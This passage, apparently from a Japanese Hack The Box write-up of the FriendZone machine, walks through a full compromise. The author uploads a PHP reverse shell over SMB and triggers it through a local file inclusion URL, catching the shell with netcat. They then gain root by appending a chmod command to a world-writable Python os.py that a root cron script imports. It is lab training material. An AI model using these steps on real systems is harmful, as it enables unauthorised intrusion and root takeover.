smbで転送

smb で以下を upload します
https://github.com/pentestmonkey/php-reverse-shell

kali@kali:~$ smbclient //10.10.10.123/Development
Enter WORKGROUP\kali's password:                                                                                                                                                                                                           
Try "help" to get a list of possible commands.                                                                                                                                                                                             
smb: \> put php-reverse-shell.php                                                                                                                                                                                                          
putting file php-reverse-shell.php as \php-reverse-shell.php (6.9 kb/s) (average 6.9 kb/s)                                                                                                                                                 
smb: \> ls                                                                                                                                                                                                                                 
  .                                   D        0  Sun Jun 21 20:02:08 2020
  ..                                  D        0  Wed Jan 23 16:51:02 2019
  php-reverse-shell.php               A     5493  Sun Jun 21 20:04:58 2020

                9221460 blocks of size 1024. 6373116 blocks available
smb: \> exit

これで以下にアクセスすると…

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell

shell が取れます

kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.123] 58082
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 03:05:57 up  5:44,  0 users,  load average: 1.03, 0.65, 0.38
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'          
www-data@FriendZone:/$ 

pspy

www-data@FriendZone:/$ ./tmp/pspy64 -i 1000 
./tmp/pspy64 -i 1000 
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 1s and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/06/22 03:28:57 CMD: UID=0    PID=98     | 
2020/06/22 03:28:57 CMD: UID=0    PID=9      | 
2020/06/22 03:28:57 CMD: UID=0    PID=89     | 
2020/06/22 03:28:57 CMD: UID=107  PID=861    | /usr/sbin/exim4 -bd -q30m 
2020/06/22 03:28:57 CMD: UID=0    PID=854    | /usr/sbin/smbd --foreground --no-process-group 
2020/06/22 03:28:57 CMD: UID=0    PID=852    | /usr/sbin/smbd --foreground --no-process-group 
2020/06/22 03:28:57 CMD: UID=0    PID=851    | /usr/sbin/smbd --foreground --no-process-group 
2020/06/22 03:28:57 CMD: UID=0    PID=85     | 
2020/06/22 03:28:57 CMD: UID=0    PID=82     | 
2020/06/22 03:28:57 CMD: UID=0    PID=81     | 
2020/06/22 03:28:57 CMD: UID=0    PID=80     | 
2020/06/22 03:28:57 CMD: UID=0    PID=8      | 
2020/06/22 03:28:57 CMD: UID=0    PID=79     | 
2020/06/22 03:28:57 CMD: UID=0    PID=78     | 
2020/06/22 03:28:57 CMD: UID=0    PID=77     | 
2020/06/22 03:28:57 CMD: UID=0    PID=726    | /usr/sbin/smbd --foreground --no-process-group 
2020/06/22 03:28:57 CMD: UID=0    PID=7      | 
2020/06/22 03:28:57 CMD: UID=0    PID=6      | 
2020/06/22 03:28:57 CMD: UID=33   PID=5740   | ./tmp/pspy64 -i 1000 
2020/06/22 03:28:57 CMD: UID=33   PID=5737   | /bin/bash 
2020/06/22 03:28:57 CMD: UID=33   PID=5736   | python3 -c import pty; pty.spawn("/bin/bash") 
2020/06/22 03:28:57 CMD: UID=33   PID=5735   | /bin/sh -i 
2020/06/22 03:28:57 CMD: UID=0    PID=5733   | 
2020/06/22 03:28:57 CMD: UID=0    PID=5732   | 
2020/06/22 03:28:57 CMD: UID=33   PID=5729   | sh -c uname -a; w; id; /bin/sh -i 
2020/06/22 03:28:57 CMD: UID=0    PID=572    | /usr/sbin/nmbd --foreground --no-process-group 
2020/06/22 03:28:57 CMD: UID=0    PID=566    | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=0    PID=5647   | 
2020/06/22 03:28:57 CMD: UID=0    PID=564    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2020/06/22 03:28:57 CMD: UID=0    PID=5639   | 
2020/06/22 03:28:57 CMD: UID=0    PID=562    | /usr/sbin/sshd -D 
2020/06/22 03:28:57 CMD: UID=33   PID=5531   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=0    PID=550    | /usr/sbin/vsftpd /etc/vsftpd.conf 
2020/06/22 03:28:57 CMD: UID=33   PID=5497   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=33   PID=5484   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=33   PID=5481   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=0    PID=5473   | 
2020/06/22 03:28:57 CMD: UID=33   PID=5464   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=33   PID=5416   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=33   PID=5415   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=109  PID=541    | /usr/sbin/named -f -4 -u bind 
2020/06/22 03:28:57 CMD: UID=33   PID=5383   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=33   PID=5364   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=33   PID=5351   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=33   PID=5320   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=0    PID=4      | 
2020/06/22 03:28:57 CMD: UID=0    PID=391    | /usr/lib/accountsservice/accounts-daemon 
2020/06/22 03:28:57 CMD: UID=0    PID=390    | /usr/sbin/cron -f 
2020/06/22 03:28:57 CMD: UID=102  PID=382    | /usr/sbin/rsyslogd -n 
2020/06/22 03:28:57 CMD: UID=0    PID=381    | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers 
2020/06/22 03:28:57 CMD: UID=0    PID=379    | /lib/systemd/systemd-logind 
2020/06/22 03:28:57 CMD: UID=0    PID=378    | /usr/bin/VGAuthService 
2020/06/22 03:28:57 CMD: UID=103  PID=377    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
2020/06/22 03:28:57 CMD: UID=0    PID=35     | 
2020/06/22 03:28:57 CMD: UID=0    PID=34     | 
2020/06/22 03:28:57 CMD: UID=0    PID=32     | 
2020/06/22 03:28:57 CMD: UID=62583 PID=314    | /lib/systemd/systemd-timesyncd 
2020/06/22 03:28:57 CMD: UID=101  PID=313    | /lib/systemd/systemd-resolved 
2020/06/22 03:28:57 CMD: UID=0    PID=30     | 
2020/06/22 03:28:57 CMD: UID=0    PID=29     | 
2020/06/22 03:28:57 CMD: UID=0    PID=28     | 
2020/06/22 03:28:57 CMD: UID=0    PID=27     | 
2020/06/22 03:28:57 CMD: UID=0    PID=26     | 
2020/06/22 03:28:57 CMD: UID=100  PID=254    | /lib/systemd/systemd-networkd 
2020/06/22 03:28:57 CMD: UID=0    PID=252    | /lib/systemd/systemd-udevd 
2020/06/22 03:28:57 CMD: UID=0    PID=25     | 
2020/06/22 03:28:57 CMD: UID=0    PID=24     | 
2020/06/22 03:28:57 CMD: UID=0    PID=233    | /lib/systemd/systemd-journald 
2020/06/22 03:28:57 CMD: UID=0    PID=230    | /usr/bin/vmtoolsd 
2020/06/22 03:28:57 CMD: UID=0    PID=23     | 
2020/06/22 03:28:57 CMD: UID=0    PID=22     | 
2020/06/22 03:28:57 CMD: UID=0    PID=21     | 
2020/06/22 03:28:57 CMD: UID=0    PID=20     | 
2020/06/22 03:28:57 CMD: UID=0    PID=2      | 
2020/06/22 03:28:57 CMD: UID=0    PID=195    | 
2020/06/22 03:28:57 CMD: UID=0    PID=194    | 
2020/06/22 03:28:57 CMD: UID=0    PID=19     | 
2020/06/22 03:28:57 CMD: UID=0    PID=18     | 
2020/06/22 03:28:57 CMD: UID=0    PID=173    | 
2020/06/22 03:28:57 CMD: UID=0    PID=172    | 
2020/06/22 03:28:57 CMD: UID=0    PID=171    | 
2020/06/22 03:28:57 CMD: UID=0    PID=17     | 
2020/06/22 03:28:57 CMD: UID=0    PID=169    | 
2020/06/22 03:28:57 CMD: UID=0    PID=168    | 
2020/06/22 03:28:57 CMD: UID=0    PID=167    | 
2020/06/22 03:28:57 CMD: UID=0    PID=16     | 
2020/06/22 03:28:57 CMD: UID=0    PID=15     | 
2020/06/22 03:28:57 CMD: UID=0    PID=14     | 
2020/06/22 03:28:57 CMD: UID=0    PID=13     | 
2020/06/22 03:28:57 CMD: UID=0    PID=12     | 
2020/06/22 03:28:57 CMD: UID=0    PID=115    | 
2020/06/22 03:28:57 CMD: UID=0    PID=11     | 
2020/06/22 03:28:57 CMD: UID=0    PID=10     | 
2020/06/22 03:28:57 CMD: UID=0    PID=1      | /sbin/init splash 
2020/06/22 03:30:01 CMD: UID=0    PID=5750   | /bin/sh -c /opt/server_admin/reporter.py 
2020/06/22 03:30:01 CMD: UID=0    PID=5749   | /bin/sh -c /opt/server_admin/reporter.py 
2020/06/22 03:30:01 CMD: UID=0    PID=5748   | /usr/sbin/CRON -f 

/bin/sh -c /opt/server_admin/reporter.pyを見てみます

www-data@FriendZone:/$ cat /opt/server_admin/reporter.py
cat /opt/server_admin/reporter.py
#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer
www-data@FriendZone:/$ ls -la /opt/server_admin/reporter.py
ls -la /opt/server_admin/reporter.py
-rwxr--r-- 1 root root 424 Jan 16  2019 /opt/server_admin/reporter.py

書き換えはできなさそうです。う〜んと眺めていると

www-data@FriendZone:/$ ls -la /usr/lib/python2.7/os.py
ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15  2019 /usr/lib/python2.7/os.py

import している os.py の方に write の権限があります

import されてるだけで実行の効力があるのか分からんなぁと思いつつ

www-data@FriendZone:/$  echo "system('chmod 777 /root')" >> /usr/lib/python2.7/os.py    
<'chmod 777 /root')" >> /usr/lib/python2.7/os.py 

これで/root の権限を変更するような追記をしました

www-data@FriendZone:/$ ls -la
ls -la
total 434908
drwxr-xr-x  22 root root      4096 Oct  5  2018 .
drwxr-xr-x  22 root root      4096 Oct  5  2018 ..
drwxr-xr-x   2 root root      4096 Oct  5  2018 bin
drwxr-xr-x   3 root root      4096 Oct  5  2018 boot
drwxr-xr-x  18 root root      3880 Jun 21 21:21 dev
drwxr-xr-x  90 root root      4096 Jan 23  2019 etc
drwxr-xr-x   3 root root      4096 Oct  5  2018 home
lrwxrwxrwx   1 root root        33 Oct  5  2018 initrd.img -> boot/initrd.img-4.15.0-36-generic
lrwxrwxrwx   1 root root        33 Oct  5  2018 initrd.img.old -> boot/initrd.img-4.15.0-36-generic
drwxr-xr-x  18 root root      4096 Jan 23  2019 lib
drwxr-xr-x   2 root root      4096 Oct  5  2018 lib64
drwx------   2 root root     16384 Oct  5  2018 lost+found
drwxr-xr-x   2 root root      4096 Oct  5  2018 media
drwxr-xr-x   2 root root      4096 Oct  5  2018 mnt
drwxr-xr-x   3 root root      4096 Oct  6  2018 opt
dr-xr-xr-x 102 root root         0 Jun 21 21:21 proc
drwxrwxrwx   6 root root      4096 Jan 24  2019 root
drwxr-xr-x  24 root root       640 Jun 21 21:21 run
drwxr-xr-x   2 root root      4096 Jan 23  2019 sbin
drwxr-xr-x   3 root root      4096 Oct  5  2018 srv
-rw-------   1 root root 445255680 Oct  5  2018 swapfile
dr-xr-xr-x  13 root root         0 Jun 22 03:34 sys
drwxrwxrwt   2 root root      4096 Jun 22 03:13 tmp
drwxr-xr-x  10 root root      4096 Oct  5  2018 usr
drwxr-xr-x  12 root root      4096 Oct  6  2018 var
lrwxrwxrwx   1 root root        30 Oct  5  2018 vmlinuz -> boot/vmlinuz-4.15.0-36-generic
lrwxrwxrwx   1 root root        30 Oct  5  2018 vmlinuz.old -> boot/vmlinuz-4.15.0-36-generic
www-data@FriendZone:/$ cd root
cd root
www-data@FriendZone:/root$ cat root.txt

しばらく待っていると root にアクセスできるようになりました。

終わりに

色んな enumration をしなきゃいけない&色んな可能性が考えられるって言うすごい良 machine でした

Share on

さんぽし
WRITTEN BY
さんぽし
Web Developer /w Elixir, Go